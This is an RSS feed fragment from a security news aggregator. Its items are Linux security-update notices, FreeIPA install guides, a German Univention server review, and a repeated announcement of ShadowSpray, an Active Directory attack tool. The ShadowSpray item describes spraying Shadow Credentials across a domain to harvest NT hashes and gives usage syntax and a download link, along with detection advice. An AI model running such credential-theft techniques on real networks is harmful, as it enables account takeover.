<description><![CDATA[Security updates have been issued by Debian (xorg-server), Fedora (chromium, dotnet8.0, firefox, freeipa, and thunderbird), Red Hat (avahi, c-ares, curl, edk2, expat, freetype, frr, git, gnutls, grub2, kernel, kernel-rt, libcap, libfastjson, libssh, libtasn1, libxml2, linux-firmware, ncurses, oni...]]></description>
<link>https://tsecurity.de/de/2007073/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2007073/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 26 Jan 2024 16:01:44 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (xorg-server), <b>Fedora</b> (chromium, dotnet8.0, firefox, freeipa, and thunderbird), <b>Red Hat</b> (avahi, c-ares, curl, edk2, expat, freetype, frr, git, gnutls, grub2, kernel, kernel-rt, libcap, libfastjson, libssh, libtasn1, libxml2, linux-firmware, ncurses, oniguruma, openssh, openssl, perl-HTTP-Tiny, protobuf-c, python-urllib3, python3, python3.9, rpm, samba, shadow-utils, sqlite, tcpdump, tomcat, and virt:rhel and virt-devel:rhel modules), <b>SUSE</b> (cpio, jasper, rear23a, thunderbird, and xorg-x11-server), and <b>Ubuntu</b> (jinja2, kernel, linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke,
 linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15,
 linux-kvm, linux-lowlatency-hwe-5.15, linux-raspi, linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-5.4,
 linux-bluefield, linux-gcp, linux-gcp-5.4, linux-gkeop, linux-hwe-5.4,
 linux-ibm, linux-ibm-5.4, linux-iot, linux-oracle, linux-oracle-5.4,
 linux-raspi, linux-raspi-5.4, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-6.2, linux-azure, linux-azure-6.2,
 linux-azure-fde-6.2, linux-gcp, linux-hwe-6.5, linux-laptop,
 linux-lowlatency, linux-lowlatency-hwe-6.5, linux-oem-6.5, linux-oracle,
 linux-raspi, linux-starfive, linux, linux-aws, linux-aws-hwe, linux-gcp, linux-gcp-4.15, linux-hwe,
 linux-kvm, linux-oracle, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-aws, linux-azure, linux-azure-5.15, linux-azure-fde, linux-azure-fde-5.15, linux-oem-6.1, and mariadb, mariadb-10.3, mariadb-10.6).]]></content:encoded>
</item>
<item>
<title><![CDATA[ShadowSpray - A Tool To Spray Shadow Credentials Across An Entire Domain In Hopes Of Abusing Long Forgotten GenericWrite/GenericAll DACLs Over Other Objects In The Domain]]></title>
<description><![CDATA[A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.  Why this tool  In a lot of engagements I see (in BloodHound) that the group "Everyone" / "Authenticated Users" / "Domain Users" or some ot...]]></description>
<link>https://tsecurity.de/de/1891455/it-security-nachrichten/shadowspray-a-tool-to-spray-shadow-credentials-across-an-entire-domain-in-hopes-of-abusing-long-forgotten-genericwritegenericall-dacls-over-other-objects-in-the-domain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1891455/it-security-nachrichten/shadowspray-a-tool-to-spray-shadow-credentials-across-an-entire-domain-in-hopes-of-abusing-long-forgotten-genericwritegenericall-dacls-over-other-objects-in-the-domain/</guid>
<pubDate>Wed, 24 May 2023 16:20:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjvkizJCO_NXTQew1wobcjeVj99KLogzLxUjAvzE2LgpENh_Jee08Se6ZbtcvIetjw5LQBRk8pijAutXkJ1JsU3VTtTq4T_ozeTHGixfs6Iu42zbKupWa8KgvwvNT6rEvyBbhaNWQHcixf1MYfa_k67qv9vWFH1c57iaBazRPExSf6aWhTw3QBUdanb1w"><img alt="" border="0" height="380" src="https://blogger.googleusercontent.com/img/a/AVvXsEjvkizJCO_NXTQew1wobcjeVj99KLogzLxUjAvzE2LgpENh_Jee08Se6ZbtcvIetjw5LQBRk8pijAutXkJ1JsU3VTtTq4T_ozeTHGixfs6Iu42zbKupWa8KgvwvNT6rEvyBbhaNWQHcixf1MYfa_k67qv9vWFH1c57iaBazRPExSf6aWhTw3QBUdanb1w=w640-h380" width="640"></a></p><br><p dir="auto">A tool to spray <a href="https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab" rel="nofollow" target="_blank" title="Shadow Credentials">Shadow Credentials</a> across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.</p>  <h3 dir="auto" tabindex="-1">Why this tool</h3>  <p dir="auto">In a lot of engagements I see (in <a href="https://github.com/BloodHoundAD/BloodHound" rel="nofollow" target="_blank" title="BloodHound">BloodHound</a>) that the group "Everyone" / "Authenticated Users" / "Domain Users" or some other wide group, which contains almost all the users in the domain, has some GenericWrite/GenericAll DACLs over other objects in the domain.</p>  <span><a name="more"></a></span><p dir="auto"><br></p>  <p dir="auto">These rights can be abused to add Shadow <a href="https://www.kitploit.com/search/label/Credentials" target="_blank" title="Credentials">Credentials</a> on the target object and obtain it's TGT and NT Hash.</p>  <p dir="auto">It occurred to me that we can just try and spray shadow credentials over the entire domain and see what's sticks (obviously this approach is better suited to non-stealth engagements, don't use this in a red team where stealth is required). When a Shadow Credentials is successfuly added, we simply do the whole PKINIT + UnPACTheHash dance and voilà - we get NT Hashes.</p>  <p dir="auto">Since the process is extremely fast, this can be used at the very start of the engagement, and hopefully you'll have some users and computers owned before you even start.</p>  <p dir="auto"><strong>Note</strong>: I recycled a lot of code from my <a href="https://github.com/Dec0ne/KrbRelayUp" rel="nofollow" target="_blank" title="previous tool">previous tool</a> so AV/EDRs might flag this as KrbRelayUp...</p>  <h3 dir="auto" tabindex="-1">How this tool works</h3>  <p dir="auto">It goes something like this:</p>  <ol dir="auto" start="0"><li>Login to the domain with the supplied credentials (Or use the current session).</li>  <li>Check that the domain functional level is 2016 (Otherwise stop since the Shadow Credentials attack won't work)</li>  <li>Gather a list of all the objects in the domain (users and computers) from LDAP.</li>  <li>For every object in the list do the following:  <ol dir="auto"><li>Try to add KeyCredential to the object's "msDS-KeyCredentialLink" attribute.</li>  <li>If the above is successful, use PKINIT to request a TGT using the added KeyCredential.</li>  <li>If the above is successful, perform an UnPACTheHash attack to reveal the user/computer NT hash.</li>  <li>If <strong>--RestoreShadowCred</strong> was specified: Remove the added KeyCredential (clean up after yourself...)</li>  </ol></li>  <li>If <strong>--Recursive</strong> was specified: Do the same process using each of the user/computer accounts we successfully owned.</li>  </ol><p dir="auto">ShadowSpray supports CTRL+C so if at any point you wish to stop the execution just hit CTRL+C and ShadowSpray will display the NT Hashes recovered so far before exiting (as shown in the demo below).</p>  <h2 dir="auto" tabindex="-1">Usage</h2>  <div><pre><code> __             __   __        __   __   __<br>/__` |__|  /\  |  \ /  \ |  | /__` |__) |__)  /\  \ /<br>.__/ |  | /~~\ |__/ \__/ |/\| .__/ |    |  \ /~~\  |<br><br><br>Usage: ShadowSpray.exe [-d FQDN] [-dc FQDN] [-u USERNAME] [-p PASSWORD] [-r] [-re] [-cp CERT_PASSWORD] [-ssl]<br><br>    -r   (--RestoreShadowCred)       Restore "msDS-KeyCredentialLink" attribute after the attack is done. (Optional)<br>    -re  (--Recursive)               Perform ShadowSpray attack recursivly. (Optional)<br>    -cp  (--CertificatePassword)     Certificate password. (default = random password)<br><br><br>General Options:<br>    -u  (--Username)                 Username for initial LDAP authentication. (Optional)<br>    -p  (--Password)                 Password for initial LDAP authentication. (Optional)<br>    -d  (--Domain)                   FQDN of domain. (Optional)<br>    -dc (--DomainController)         FQDN of domain controller. (Optional)<br>    -ssl                                Use LDAP over SSL. (Optional)<br>    -y  (--AutoY)                    Don't ask for confirmation to start the ShadowSpray attack. (Optional)<br></code></pre></div>  <h2 dir="auto" tabindex="-1">TODO</h2>  <ul class="contains-task-list"><li class="task-list-item">Code refactoring and cleanup!!!</li>  <li class="task-list-item">Add Verbose output option</li>  <li class="task-list-item">Add option to save KeyCredentials added / TGT requested / NT Hashes gathered to a file on disk</li>  <li class="task-list-item">Python version ;)</li>  <li class="task-list-item">Other suggestions will be welcomed</li>  </ul><h2 dir="auto" tabindex="-1">Mitigation and Detection</h2>  <p dir="auto">Taken from <a href="https://twitter.com/elad_shamir" rel="nofollow" target="_blank" title="Elad Shamir">Elad Shamir</a>'s blog post on <a href="https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab" rel="nofollow" target="_blank" title="Shadow Credentials">Shadow Credentials</a>:</p>  <ul dir="auto"><li>  <p dir="auto">If PKINIT <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> is not common in the environment or not common for the target account, the “Kerberos authentication ticket (TGT) was requested” event (4768) can indicate anomalous behavior when the Certificate Information attributes are not blank.</p>  </li>  <li>  <p dir="auto">If a SACL is configured to audit <a href="https://www.kitploit.com/search/label/Active%20Directory" target="_blank" title="Active Directory">Active Directory</a> object modifications for the targeted account, the “Directory service object was modified” event (5136) can indicate anomalous behavior if the subject changing the msDS-KeyCredentialLink is not the Azure AD Connect <a href="https://www.kitploit.com/search/label/Synchronization" target="_blank" title="synchronization">synchronization</a> account or the ADFS service account, which will typically act as the Key <a href="https://www.kitploit.com/search/label/Provisioning" target="_blank" title="Provisioning">Provisioning</a> Server and legitimately modify this attribute for users.</p>  </li>  <li>  <p dir="auto">A more specific preventive control is adding an Access Control Entry (ACE) to DENY the principal EVERYONE from modifying the attribute msDS-KeyCredentialLink for any account not meant to be enrolled in Key Trust passwordless authentication, and particularly privileged accounts.</p>  </li>  <li>  <p dir="auto"><a href="https://medium.com/falconforce/falconfriday-detecting-unpacing-and-shadowed-credentials-0xff1e-2246934247ce" rel="nofollow" target="_blank" title="Detecting UnPACing and shadowed credentials">Detecting UnPACing and shadowed credentials</a> by Henri Hambartsumyan of <a href="https://twitter.com/falconforceteam" rel="nofollow" target="_blank" title="FalconForce">FalconForce</a></p>  </li>  </ul><p dir="auto">ShadowSpray specific detections:</p>  <ul dir="auto"><li>This tool attempts to modify <strong>every</strong> user/computer object in the domain in a very short timeframe, when it fails (most of the time) it generates an <strong>LDAP_INSUFFICIENT_ACCESS</strong> error. It's possible to build detection around that using the same approach of detecting regular password spray.</li>  </ul><h2 dir="auto" tabindex="-1">Acknowledgements</h2>  <ul dir="auto"><li><a href="https://twitter.com/elad_shamir" rel="nofollow" target="_blank" title="Elad Shamir">Elad Shamir</a> for his research on <a href="https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab" rel="nofollow" target="_blank" title="Shadow Credentials">Shadow Credentials</a> and his awsome tool <a href="https://github.com/eladshamir/Whisker" rel="nofollow" target="_blank" title="Whisker">Whisker</a>.</li>  <li><a href="https://twitter.com/harmj0y" rel="nofollow" target="_blank" title="Will Schroeder">Will Schroeder</a> and everyone who contributed to <a href="https://github.com/GhostPack/Rubeus/" rel="nofollow" target="_blank" title="Rubeus">Rubeus</a> which we all know and love. Basically all the TGT/TGS/UnPACTheHash functionality was taken from there.</li>  <li><a href="https://twitter.com/cube0x0" rel="nofollow" target="_blank" title="Cube0x0">Cube0x0</a> Some of the code (specifically the modifications of LDAP attributes via WINAPI) was taken from his amazing tool <a href="https://github.com/cube0x0/KrbRelay" rel="nofollow" target="_blank" title="KrbRelay">KrbRelay</a>.</li>  <li><a href="https://twitter.com/mgrafnetter" rel="nofollow" target="_blank" title="Michael Grafnetter">Michael Grafnetter</a> for his tool <a href="https://github.com/MichaelGrafnetter/DSInternals" rel="nofollow" target="_blank" title="DSInternals">DSInternals</a> which was used here to help with the Shadow Credentials functionality.</li>  <li><a href="https://github.com/Orange-Cyberdefense" rel="nofollow" target="_blank" title="Orange-Cyberdefense">Orange-Cyberdefense</a> for their work on <a href="https://github.com/Orange-Cyberdefense/GOAD" rel="nofollow" target="_blank" title="GOAD">GOAD</a>, the Active Directory research lab I am using which you can see in the demo video and images.</li>  <li><a href="https://twitter.com/Mpdreamz" rel="nofollow" target="_blank" title="Martijn Laarman">Martijn Laarman</a> for the nice <a href="https://github.com/Mpdreamz/shellprogressbar" rel="nofollow" target="_blank" title="progress bar">progress bar</a> used in this tool.</li>  </ul><br><br><div><b><span><a class="kiploit-download" href="https://github.com/Dec0ne/ShadowSpray" rel="nofollow" target="_blank" title="Download ShadowSpray">Download ShadowSpray</a></span></b></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Install FreeIPA Client on RHEL | Rocky Linux | AlmaLinux]]></title>
<description><![CDATA[In this post, we will show you how to install and configure FreeIPA client on RHEL, Rocky Linux or AlmaLinux. For the demonstration purpose, we will integrate a RHEL system with FreeIPA server using FreeIPA client for centralize authentication. FreeIPA server is an open-source identity ... Read m...]]></description>
<link>https://tsecurity.de/de/1890685/unix-server/how-to-install-freeipa-client-on-rhel-rocky-linux-almalinux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1890685/unix-server/how-to-install-freeipa-client-on-rhel-rocky-linux-almalinux/</guid>
<pubDate>Wed, 24 May 2023 10:35:27 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this post, we will show you how to install and configure FreeIPA client on RHEL, Rocky Linux or AlmaLinux. For the demonstration purpose, we will integrate a RHEL system with FreeIPA server using FreeIPA client for centralize authentication. FreeIPA server is an open-source identity ... <a title="How to Install FreeIPA Client on RHEL | Rocky Linux | AlmaLinux" class="read-more" href="https://www.linuxtechi.com/install-freeipa-client-on-rhel-rockylinux-almalinux/" aria-label="More on How to Install FreeIPA Client on RHEL | Rocky Linux | AlmaLinux">Read more</a></p>
The post <a href="https://www.linuxtechi.com/install-freeipa-client-on-rhel-rockylinux-almalinux/">How to Install FreeIPA Client on RHEL | Rocky Linux | AlmaLinux</a> first appeared on <a href="https://www.linuxtechi.com/"></a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[ShadowSpray - A Tool To Spray Shadow Credentials Across An Entire Domain In Hopes Of Abusing Long Forgotten GenericWrite/GenericAll DACLs Over Other Objects In The Domain]]></title>
<description><![CDATA[A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.  Why this tool  In a lot of engagements I see (in BloodHound) that the group "Everyone" / "Authenticated Users" / "Domain Users" or some ot...]]></description>
<link>https://tsecurity.de/de/1887653/it-security-nachrichten/shadowspray-a-tool-to-spray-shadow-credentials-across-an-entire-domain-in-hopes-of-abusing-long-forgotten-genericwritegenericall-dacls-over-other-objects-in-the-domain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1887653/it-security-nachrichten/shadowspray-a-tool-to-spray-shadow-credentials-across-an-entire-domain-in-hopes-of-abusing-long-forgotten-genericwritegenericall-dacls-over-other-objects-in-the-domain/</guid>
<pubDate>Wed, 24 May 2023 10:07:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjvkizJCO_NXTQew1wobcjeVj99KLogzLxUjAvzE2LgpENh_Jee08Se6ZbtcvIetjw5LQBRk8pijAutXkJ1JsU3VTtTq4T_ozeTHGixfs6Iu42zbKupWa8KgvwvNT6rEvyBbhaNWQHcixf1MYfa_k67qv9vWFH1c57iaBazRPExSf6aWhTw3QBUdanb1w"><img alt="" border="0" height="380" src="https://blogger.googleusercontent.com/img/a/AVvXsEjvkizJCO_NXTQew1wobcjeVj99KLogzLxUjAvzE2LgpENh_Jee08Se6ZbtcvIetjw5LQBRk8pijAutXkJ1JsU3VTtTq4T_ozeTHGixfs6Iu42zbKupWa8KgvwvNT6rEvyBbhaNWQHcixf1MYfa_k67qv9vWFH1c57iaBazRPExSf6aWhTw3QBUdanb1w=w640-h380" width="640"></a></p><br><p dir="auto">A tool to spray <a href="https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab" rel="nofollow" target="_blank" title="Shadow Credentials">Shadow Credentials</a> across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.</p>  <h3 dir="auto" tabindex="-1">Why this tool</h3>  <p dir="auto">In a lot of engagements I see (in <a href="https://github.com/BloodHoundAD/BloodHound" rel="nofollow" target="_blank" title="BloodHound">BloodHound</a>) that the group "Everyone" / "Authenticated Users" / "Domain Users" or some other wide group, which contains almost all the users in the domain, has some GenericWrite/GenericAll DACLs over other objects in the domain.</p>  <span><a name="more"></a></span><p dir="auto"><br></p>  <p dir="auto">These rights can be abused to add Shadow <a href="https://www.kitploit.com/search/label/Credentials" target="_blank" title="Credentials">Credentials</a> on the target object and obtain it's TGT and NT Hash.</p>  <p dir="auto">It occurred to me that we can just try and spray shadow credentials over the entire domain and see what's sticks (obviously this approach is better suited to non-stealth engagements, don't use this in a red team where stealth is required). When a Shadow Credentials is successfuly added, we simply do the whole PKINIT + UnPACTheHash dance and voilà - we get NT Hashes.</p>  <p dir="auto">Since the process is extremely fast, this can be used at the very start of the engagement, and hopefully you'll have some users and computers owned before you even start.</p>  <p dir="auto"><strong>Note</strong>: I recycled a lot of code from my <a href="https://github.com/Dec0ne/KrbRelayUp" rel="nofollow" target="_blank" title="previous tool">previous tool</a> so AV/EDRs might flag this as KrbRelayUp...</p>  <h3 dir="auto" tabindex="-1">How this tool works</h3>  <p dir="auto">It goes something like this:</p>  <ol dir="auto" start="0"><li>Login to the domain with the supplied credentials (Or use the current session).</li>  <li>Check that the domain functional level is 2016 (Otherwise stop since the Shadow Credentials attack won't work)</li>  <li>Gather a list of all the objects in the domain (users and computers) from LDAP.</li>  <li>For every object in the list do the following:  <ol dir="auto"><li>Try to add KeyCredential to the object's "msDS-KeyCredentialLink" attribute.</li>  <li>If the above is successful, use PKINIT to request a TGT using the added KeyCredential.</li>  <li>If the above is successful, perform an UnPACTheHash attack to reveal the user/computer NT hash.</li>  <li>If <strong>--RestoreShadowCred</strong> was specified: Remove the added KeyCredential (clean up after yourself...)</li>  </ol></li>  <li>If <strong>--Recursive</strong> was specified: Do the same process using each of the user/computer accounts we successfully owned.</li>  </ol><p dir="auto">ShadowSpray supports CTRL+C so if at any point you wish to stop the execution just hit CTRL+C and ShadowSpray will display the NT Hashes recovered so far before exiting (as shown in the demo below).</p>  <h2 dir="auto" tabindex="-1">Usage</h2>  <div><pre><code> __             __   __        __   __   __<br>/__` |__|  /\  |  \ /  \ |  | /__` |__) |__)  /\  \ /<br>.__/ |  | /~~\ |__/ \__/ |/\| .__/ |    |  \ /~~\  |<br><br><br>Usage: ShadowSpray.exe [-d FQDN] [-dc FQDN] [-u USERNAME] [-p PASSWORD] [-r] [-re] [-cp CERT_PASSWORD] [-ssl]<br><br>    -r   (--RestoreShadowCred)       Restore "msDS-KeyCredentialLink" attribute after the attack is done. (Optional)<br>    -re  (--Recursive)               Perform ShadowSpray attack recursivly. (Optional)<br>    -cp  (--CertificatePassword)     Certificate password. (default = random password)<br><br><br>General Options:<br>    -u  (--Username)                 Username for initial LDAP authentication. (Optional)<br>    -p  (--Password)                 Password for initial LDAP authentication. (Optional)<br>    -d  (--Domain)                   FQDN of domain. (Optional)<br>    -dc (--DomainController)         FQDN of domain controller. (Optional)<br>    -ssl                                Use LDAP over SSL. (Optional)<br>    -y  (--AutoY)                    Don't ask for confirmation to start the ShadowSpray attack. (Optional)<br></code></pre></div>  <h2 dir="auto" tabindex="-1">TODO</h2>  <ul class="contains-task-list"><li class="task-list-item">Code refactoring and cleanup!!!</li>  <li class="task-list-item">Add Verbose output option</li>  <li class="task-list-item">Add option to save KeyCredentials added / TGT requested / NT Hashes gathered to a file on disk</li>  <li class="task-list-item">Python version ;)</li>  <li class="task-list-item">Other suggestions will be welcomed</li>  </ul><h2 dir="auto" tabindex="-1">Mitigation and Detection</h2>  <p dir="auto">Taken from <a href="https://twitter.com/elad_shamir" rel="nofollow" target="_blank" title="Elad Shamir">Elad Shamir</a>'s blog post on <a href="https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab" rel="nofollow" target="_blank" title="Shadow Credentials">Shadow Credentials</a>:</p>  <ul dir="auto"><li>  <p dir="auto">If PKINIT <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> is not common in the environment or not common for the target account, the “Kerberos authentication ticket (TGT) was requested” event (4768) can indicate anomalous behavior when the Certificate Information attributes are not blank.</p>  </li>  <li>  <p dir="auto">If a SACL is configured to audit <a href="https://www.kitploit.com/search/label/Active%20Directory" target="_blank" title="Active Directory">Active Directory</a> object modifications for the targeted account, the “Directory service object was modified” event (5136) can indicate anomalous behavior if the subject changing the msDS-KeyCredentialLink is not the Azure AD Connect <a href="https://www.kitploit.com/search/label/Synchronization" target="_blank" title="synchronization">synchronization</a> account or the ADFS service account, which will typically act as the Key <a href="https://www.kitploit.com/search/label/Provisioning" target="_blank" title="Provisioning">Provisioning</a> Server and legitimately modify this attribute for users.</p>  </li>  <li>  <p dir="auto">A more specific preventive control is adding an Access Control Entry (ACE) to DENY the principal EVERYONE from modifying the attribute msDS-KeyCredentialLink for any account not meant to be enrolled in Key Trust passwordless authentication, and particularly privileged accounts.</p>  </li>  <li>  <p dir="auto"><a href="https://medium.com/falconforce/falconfriday-detecting-unpacing-and-shadowed-credentials-0xff1e-2246934247ce" rel="nofollow" target="_blank" title="Detecting UnPACing and shadowed credentials">Detecting UnPACing and shadowed credentials</a> by Henri Hambartsumyan of <a href="https://twitter.com/falconforceteam" rel="nofollow" target="_blank" title="FalconForce">FalconForce</a></p>  </li>  </ul><p dir="auto">ShadowSpray specific detections:</p>  <ul dir="auto"><li>This tool attempts to modify <strong>every</strong> user/computer object in the domain in a very short timeframe, when it fails (most of the time) it generates an <strong>LDAP_INSUFFICIENT_ACCESS</strong> error. It's possible to build detection around that using the same approach of detecting regular password spray.</li>  </ul><h2 dir="auto" tabindex="-1">Acknowledgements</h2>  <ul dir="auto"><li><a href="https://twitter.com/elad_shamir" rel="nofollow" target="_blank" title="Elad Shamir">Elad Shamir</a> for his research on <a href="https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab" rel="nofollow" target="_blank" title="Shadow Credentials">Shadow Credentials</a> and his awsome tool <a href="https://github.com/eladshamir/Whisker" rel="nofollow" target="_blank" title="Whisker">Whisker</a>.</li>  <li><a href="https://twitter.com/harmj0y" rel="nofollow" target="_blank" title="Will Schroeder">Will Schroeder</a> and everyone who contributed to <a href="https://github.com/GhostPack/Rubeus/" rel="nofollow" target="_blank" title="Rubeus">Rubeus</a> which we all know and love. Basically all the TGT/TGS/UnPACTheHash functionality was taken from there.</li>  <li><a href="https://twitter.com/cube0x0" rel="nofollow" target="_blank" title="Cube0x0">Cube0x0</a> Some of the code (specifically the modifications of LDAP attributes via WINAPI) was taken from his amazing tool <a href="https://github.com/cube0x0/KrbRelay" rel="nofollow" target="_blank" title="KrbRelay">KrbRelay</a>.</li>  <li><a href="https://twitter.com/mgrafnetter" rel="nofollow" target="_blank" title="Michael Grafnetter">Michael Grafnetter</a> for his tool <a href="https://github.com/MichaelGrafnetter/DSInternals" rel="nofollow" target="_blank" title="DSInternals">DSInternals</a> which was used here to help with the Shadow Credentials functionality.</li>  <li><a href="https://github.com/Orange-Cyberdefense" rel="nofollow" target="_blank" title="Orange-Cyberdefense">Orange-Cyberdefense</a> for their work on <a href="https://github.com/Orange-Cyberdefense/GOAD" rel="nofollow" target="_blank" title="GOAD">GOAD</a>, the Active Directory research lab I am using which you can see in the demo video and images.</li>  <li><a href="https://twitter.com/Mpdreamz" rel="nofollow" target="_blank" title="Martijn Laarman">Martijn Laarman</a> for the nice <a href="https://github.com/Mpdreamz/shellprogressbar" rel="nofollow" target="_blank" title="progress bar">progress bar</a> used in this tool.</li>  </ul><br><br><div><b><span><a class="kiploit-download" href="https://github.com/Dec0ne/ShadowSpray" rel="nofollow" target="_blank" title="Download ShadowSpray">Download ShadowSpray</a></span></b></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Configure FreeIPA Client on Ubuntu 22.04 / 20.04]]></title>
<description><![CDATA[FreeIPA is a powerful open-source identity management system that provides centralized authentication, authorization, and accounting services. In this post, we will walk through the steps to configure FreeIPA client on Ubuntu 22.04 / 20.04. After configuring the freeipa client then we will try to...]]></description>
<link>https://tsecurity.de/de/1867688/unix-server/how-to-configure-freeipa-client-on-ubuntu-2204-2004/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1867688/unix-server/how-to-configure-freeipa-client-on-ubuntu-2204-2004/</guid>
<pubDate>Sun, 16 Apr 2023 12:22:28 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>FreeIPA is a powerful open-source identity management system that provides centralized authentication, authorization, and accounting services. In this post, we will walk through the steps to configure FreeIPA client on Ubuntu 22.04 / 20.04. After configuring the freeipa client then we will try to login ... <a title="How to Configure FreeIPA Client on Ubuntu 22.04 / 20.04" class="read-more" href="https://www.linuxtechi.com/configure-freeipa-client-on-ubuntu/" aria-label="More on How to Configure FreeIPA Client on Ubuntu 22.04 / 20.04">Read more</a></p>
The post <a href="https://www.linuxtechi.com/configure-freeipa-client-on-ubuntu/">How to Configure FreeIPA Client on Ubuntu 22.04 / 20.04</a> first appeared on <a href="https://www.linuxtechi.com/"></a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Install FreeIPA on RHEL 8 | Rocky Linux 8 | AlmaLinux 8]]></title>
<description><![CDATA[Are you looking for an easy guide on how to install FreeIPA on Linux ? The step-by-step guide on this page will show how to install FreeIPA on RHEL 8 , Rocky Linux 8 and AlmaLinux 8. FreeIPA is a free and open source centralized ... Read more
The post How to Install FreeIPA on RHEL 8 | Rocky Linu...]]></description>
<link>https://tsecurity.de/de/1866777/unix-server/how-to-install-freeipa-on-rhel-8-rocky-linux-8-almalinux-8/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1866777/unix-server/how-to-install-freeipa-on-rhel-8-rocky-linux-8-almalinux-8/</guid>
<pubDate>Sat, 15 Apr 2023 07:51:18 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Are you looking for an easy guide on how to install FreeIPA on Linux ? The step-by-step guide on this page will show how to install FreeIPA on RHEL 8 , Rocky Linux 8 and AlmaLinux 8. FreeIPA is a free and open source centralized ... <a title="How to Install FreeIPA on RHEL 8 | Rocky Linux 8 | AlmaLinux 8" class="read-more" href="https://www.linuxtechi.com/install-freeipa-rhel-rocky-almalinux/" aria-label="More on How to Install FreeIPA on RHEL 8 | Rocky Linux 8 | AlmaLinux 8">Read more</a></p>
The post <a href="https://www.linuxtechi.com/install-freeipa-rhel-rocky-almalinux/">How to Install FreeIPA on RHEL 8 | Rocky Linux 8 | AlmaLinux 8</a> first appeared on <a href="https://www.linuxtechi.com/"></a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Im Test: Univention Corporate Server 4.2]]></title>
<description><![CDATA[Im Test: Univention Corporate Server 4.2

      
      
        
          
            
                

            
          
        
              
    
  Redaktion IT-A…
Mo., 27.03.2017 - 00:00

            Der Univention Corporate Server hat sich über Jahre einen guten Ruf als Linux-basi...]]></description>
<link>https://tsecurity.de/de/1861370/server/im-test-univention-corporate-server-42/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1861370/server/im-test-univention-corporate-server-42/</guid>
<pubDate>Wed, 12 Apr 2023 18:57:59 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">Im Test: Univention Corporate Server 4.2</span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/article-229353"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/UCS-b00.jpg?itok=shUfswJq" width="480" height="319" alt="Die Datenübernahme aus dem Active Directory nach UCS stellt kein Problem dar." title="Die Datenübernahme aus dem Active Directory nach UCS stellt kein Problem dar." typeof="foaf:Image" class="image-style-medium"><span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/108" lang="" about="https://www.it-administrator.de/user/108" typeof="schema:Person" property="schema:name" datatype="" content="Redaktion IT-Administrator" class="username" xml:lang="">Redaktion IT-A…</a></span>
<span class="field field--name-created field--type-created field--label-hidden">Mo., 27.03.2017 - 00:00</span>

            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Der Univention Corporate Server hat sich über Jahre einen guten Ruf als Linux-basierter Rundumsorglos-Server für kleine Unternehmen erworben, die Lizenzgebühren einsparen, nicht aber auf die Funktionalität eines Windows-Servers verzichten möchten. Inwieweit die aktuelle Version 4.2 die entsprechenden Dienste wie Domaincontroller und Active Directory ersetzen kann, untersucht der Test.</div>
      <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
